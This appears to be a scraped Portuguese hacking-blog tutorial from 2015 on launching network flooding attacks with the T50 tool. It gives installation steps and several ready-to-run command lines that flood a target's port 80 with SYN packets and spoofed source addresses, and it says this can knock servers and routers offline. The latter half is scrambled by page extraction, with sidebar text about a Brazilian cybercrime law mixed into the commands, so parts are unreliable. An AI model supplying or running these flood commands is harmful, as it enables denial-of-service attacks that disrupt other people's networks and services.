You are on page 1of 3

INÍCIO

/

GREEN HAT

/

ENTRE NA MATRIX

/

FAQ

/

SOBRE NÓS

Realizando ataques em redes com
T50
22 DE ABRIL DE 2015 / S0PH0S

O T50 é uma forte ferramenta de ataque utilizado em redes que permite enviar
milhares de pacotes por segundo, devido a sua flexibilidade de trabalhar com
protocolos (HTTP, UDP, TCP, ARP, entre outros). Dependendo da maneira que você o

Pesquisar …

PESQUISAR

Como previsto na Lei 12.737/2012 no
Art. 154-A invadir dispositivo
informático alheio, conectado ou não à
rede de computadores, mediante
violação indevida de mecanismo de
segurança e com o fim de obter,

utiliza pode derrubar servidores, roteadores e diversos tipos de conexões entre

adulterar ou destruir dados ou

dispositivos conectado a rede.

informações sem autorização expressa

Para quem precisa instalar segue a descrição dos seguintes comandos, caso já tenha

ou tácita do titular do dispositivo ou

instalado em sua distribuiação Linux pule para a fase 2.

instalar vulnerabilidades para obter

1. Instalação

vantagem ilícita. Pena – detenção, de 3
(três) meses a 1 (um) ano, e multa.

Podemos instalar manualmente ou utilizando o Organon.

Ajude o CIência Hacker
Organon:

1 #organon -i t50
Ciência Hacker
YouTube

Manualmente:

6K

1 #sudo -sH
2 #cd /opt

Tweets de @cienciahacker

3 #git clone https://github.com/merces/t50.git
4 #cd t50
5 #make
6 #make install
7 #cd /opt/t50

Ciência Hacker

/t50 192. Execução #. TCP  Artigos./t50 192.168.2.10.104 –flood –turbo –dport 80 -S -s TCP .0. Nota: Se tiver utilizando o Kali Linux já vem instalado por padrão.0. sendo assim o comando nao tem a necessidade de usar “./” ficando desse jeito: #t50 192.168./t50 IP –flood –turbo -S –turbo –dport 80 –dport: Porta do alvo –protocol: Protocolo que será utilizado IP: Endereço do alvo Exemplo de outros comandos para ataque: . DOS / DDOS. Pentest T50 DOS DDOS s0ph0s@cienciahacker:~# whoami _ "With great power comes great responsibility" Compartilhe esse post: Facebook Twitter Google+ Como fazer Consultas Web – Whois [Windows] .10. TCP O comando acima é mais refinado permite simular diversas conexões IPs realizarem o ataque.104 –flood –turbo –dport 80 -S -s 10.104 – flood –turbo –dport 80 -S -s 10.168.0.0. podendo causar certo travamento nas maiorias dos Antivirus.0.

DES…] Deixe uma resposta O seu endereço de email não será publicado Campos obrigatórios são marcados * Nome * Email * Site Comentário Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> Publicar comentário .SHA1.Identificando tipos de Hash [MD5.